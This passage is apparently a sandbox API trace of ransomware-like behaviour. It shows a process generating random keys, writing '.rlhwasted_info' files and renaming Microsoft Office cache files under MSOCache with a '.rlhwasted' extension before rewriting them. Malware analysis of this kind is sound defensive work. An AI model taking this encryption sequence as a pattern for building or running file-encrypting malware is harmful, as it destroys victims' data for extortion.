Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0184.407] WriteFile (in: hFile=0x110, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0184.408] SetEndOfFile (hFile=0x110) returned 1 [0184.408] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.408] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0184.408] lstrcpyW (in: lpString1=0x6f1d92, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0184.408] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.rlhwasted")) returned 1 [0184.409] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0184.409] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x114 [0184.409] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x646 [0184.409] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x646) returned 0x6a0000 [0184.410] CloseHandle (hObject=0x124) returned 1 [0184.417] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0184.421] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6eb7c8 | out: pbBuffer=0x6eb7c8) returned 1 [0184.421] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.421] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0184.422] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0184.422] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.449] SetEndOfFile (hFile=0x110) returned 1 [0184.451] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x704360 | out: hHeap=0x6b0000) returned 1 [0184.451] CloseHandle (hObject=0x110) returned 1 [0184.456] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f1cf0 | out: hHeap=0x6b0000) returned 1 [0184.456] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e9120 | out: hHeap=0x6b0000) returned 1 [0184.457] _aulldvrm () returned 0x0 [0184.457] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0184.458] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0184.458] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.458] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0184.458] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a2) returned 0x6eb780 [0184.458] lstrcpyW (in: lpString1=0x6eb818, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0184.458] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0184.458] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0184.459] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0184.459] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.459] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0184.459] WriteFile (in: hFile=0x110, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0184.460] SetEndOfFile (hFile=0x110) returned 1 [0184.460] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.460] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0184.460] lstrcpyW (in: lpString1=0x6eb818, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0184.460] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted")) returned 1 [0184.465] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0184.465] CreateFileMappingW (hFile=0x114, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0184.465] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x7c4 [0184.465] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c4) returned 0x6a0000 [0184.465] CloseHandle (hObject=0x114) returned 1 [0184.477] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0184.477] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x708088 | out: pbBuffer=0x708088) returned 1 [0184.477] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.478] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0184.478] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0184.478] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.506] SetEndOfFile (hFile=0x110) returned 1 [0184.508] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x704360 | out: hHeap=0x6b0000) returned 1 [0184.508] CloseHandle (hObject=0x110) returned 1 [0184.510] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb780 | out: hHeap=0x6b0000) returned 1 [0184.510] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ed998 | out: hHeap=0x6b0000) returned 1 [0184.510] _aulldvrm () returned 0x0 [0184.510] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0184.512] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0184.512] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.512] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 81 [0184.512] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2ac) returned 0x70cfe8 [0184.513] lstrcpyW (in: lpString1=0x70d08a, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0184.513] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x708d90 [0184.513] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0184.513] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x708d90 | out: pbBuffer=0x708d90) returned 1 [0184.513] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.513] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0184.515] WriteFile (in: hFile=0x110, lpBuffer=0x708d90*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x708d90*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0184.516] SetEndOfFile (hFile=0x110) returned 1 [0184.516] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.516] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708d90 | out: hHeap=0x6b0000) returned 1 [0184.516] lstrcpyW (in: lpString1=0x70d08a, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0184.516] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.rlhwasted")) returned 1 [0184.601] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0184.601] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0184.601] GetFileSize (in: hFile=0x12c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x5ac [0184.601] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5ac) returned 0x6a0000 [0184.601] CloseHandle (hObject=0x12c) returned 1 [0184.604] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0184.606] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0184.607] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.607] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0184.607] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0184.607] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.616] SetEndOfFile (hFile=0x110) returned 1 [0184.618] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708d90 | out: hHeap=0x6b0000) returned 1 [0184.618] CloseHandle (hObject=0x110) returned 1 [0184.627] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0184.627] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec488 | out: hHeap=0x6b0000) returned 1 [0184.627] _aulldvrm () returned 0x0 [0184.627] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0184.628] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0184.628] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.628] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0184.628] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a2) returned 0x6eb780 [0184.628] lstrcpyW (in: lpString1=0x6eb818, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0184.628] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0184.628] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0184.629] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x715c88 | out: pbBuffer=0x715c88) returned 1 [0184.629] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.629] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0184.630] WriteFile (in: hFile=0x128, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0184.631] SetEndOfFile (hFile=0x128) returned 1 [0184.631] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.631] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0184.631] lstrcpyW (in: lpString1=0x6eb818, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0184.631] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted")) returned 1 [0184.632] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0184.632] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0184.632] GetFileSize (in: hFile=0x12c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x750 [0184.632] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x750) returned 0x6a0000 [0184.632] CloseHandle (hObject=0x12c) returned 1 [0184.640] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0184.641] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x7137c8 | out: pbBuffer=0x7137c8) returned 1 [0184.641] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.641] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0184.642] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0184.642] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.651] SetEndOfFile (hFile=0x128) returned 1 [0184.653] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0184.653] CloseHandle (hObject=0x128) returned 1 [0184.656] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb780 | out: hHeap=0x6b0000) returned 1 [0184.656] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e92f0 | out: hHeap=0x6b0000) returned 1 [0184.656] _aulldvrm () returned 0x0 [0184.656] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0184.657] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0184.657] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.657] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 80 [0184.657] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2aa) returned 0x70cfe8 [0184.657] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0184.658] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0184.658] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0184.658] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x715c88 | out: pbBuffer=0x715c88) returned 1 [0184.658] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.658] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0184.660] WriteFile (in: hFile=0x128, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0184.660] SetEndOfFile (hFile=0x128) returned 1 [0184.661] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.661] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0184.661] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0184.661] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.rlhwasted")) returned 1 [0184.663] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0184.664] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x12c [0184.664] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x391 [0184.664] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x391) returned 0x6a0000 [0184.664] CloseHandle (hObject=0x124) returned 1 [0184.673] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0184.674] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6eb7c8 | out: pbBuffer=0x6eb7c8) returned 1 [0184.674] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.674] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0184.675] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0184.675] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.684] SetEndOfFile (hFile=0x128) returned 1 [0184.686] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x714120 | out: hHeap=0x6b0000) returned 1 [0184.686] CloseHandle (hObject=0x128) returned 1 [0184.695] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0184.696] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ebb40 | out: hHeap=0x6b0000) returned 1 [0184.696] _aulldvrm () returned 0x0 [0184.696] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0184.697] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0184.697] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.697] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0184.697] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a2) returned 0x6eb780 [0184.697] lstrcpyW (in: lpString1=0x6eb818, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0184.697] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x714120 [0184.697] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0184.700] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x714120 | out: pbBuffer=0x714120) returned 1 [0184.700] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.701] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0184.701] WriteFile (in: hFile=0x128, lpBuffer=0x714120*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x714120*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0184.702] SetEndOfFile (hFile=0x128) returned 1 [0184.702] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.702] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x714120 | out: hHeap=0x6b0000) returned 1 [0184.702] lstrcpyW (in: 